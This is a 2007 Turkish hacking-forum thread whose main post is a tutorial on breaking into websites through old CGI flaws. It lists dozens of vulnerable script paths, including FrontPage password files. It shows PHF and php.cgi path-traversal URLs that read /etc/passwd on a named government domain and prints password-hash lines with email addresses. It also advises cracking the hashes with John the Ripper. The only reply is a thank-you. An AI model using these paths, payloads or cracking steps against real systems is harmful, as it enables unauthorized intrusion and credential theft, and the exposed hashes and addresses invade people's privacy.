PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 CGİ Acıklarıyla Hack!!!!!

Aşağa gitmek 
YazarMesaj
By_Ms-Dos
HTT Üyesi
HTT Üyesi
avatar

Mesaj Sayısı : 43
Kayıt tarihi : 30/07/07

MesajKonu: CGİ Acıklarıyla Hack!!!!!   Ptsi Tem. 30, 2007 6:06 pm

Web sitelerini CGI açiklarýndan faydalanarak kirmanin iki yolu vardir.
1. Yol: Bilindik CGI’lari browser’imizin adres satirina yazarak manuel olarak arariz. Bilindik CGI ve diðer script açiklari þöyle:

aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl

2. Yol: Manuel olarak aramak yerine isimizi kolaylastirmak için bir CGI Scanner kullanabiliriz

Not: CGI’lari aradiginizi sitede bulursaniz bunu çalistiran exploit’i de bulmaniz gerekir.
Þimdi diyelim ki iki yoldan birini kullanarak PHF açigini bulduk. Bunu þöyle kullaniriz: http://www.mit.gov.tr/cgi-bin/phf?Qa...%20/etc/passwd
yazariz (adres örnek olarak yazilmistir. Herhangi bir art niyet yoktur;o))
Tabii çikan dosya etc içindeki username ve password’lerin oldugu password dosyasi olacaktir. su sekilde:

slasher:VTNaA6DjT/9ME:1603:100:,robertmaier@gmx.net,,:/home/slasher:/bin/bash\par
mcgreen:ryKOFkUDiGO3A:1604:100:,mail@reinhard-gruene.de,,:/home/mcgreen:/bin/bash\par
abi98:cUp.uUzNzr8YY:1605:100:,baileyberni@gmx.de,, :/home/abi98:/bin/bash\par
henner_:ziprJNh85rk.o:1606:100:,henner_@web.de,,:/home/henner_:/bin/bash\par

Çýkan password’ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımýıyla hack etmek istediðimiz sayfada service.pwd varsa ne yapacaız ?
color=#006699http://www.mit.gov.tr/_vti_pvt/services.pwd
yazarız.
işte bir de PHP CGI örneði:
http://www.mit.gov.tr/cgi-bin/php.cg.../../etc/passwd
Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug’i bulduktan sonra exploit’ini bulup veya yazıp çalıstırmanız gerek
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
xir
HTT Üyesi
HTT Üyesi
avatar

Mesaj Sayısı : 102
Kayıt tarihi : 02/08/07

MesajKonu: Geri: CGİ Acıklarıyla Hack!!!!!   Perş. Ağus. 02, 2007 12:16 pm

eyw kardes
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
CGİ Acıklarıyla Hack!!!!!
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» HANGİ HASTALIĞA HANGİ YİYECEK 2
» Beynimizi tehdit eden hastalıklar
» Sistem Açıkları ve Kapatmak

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: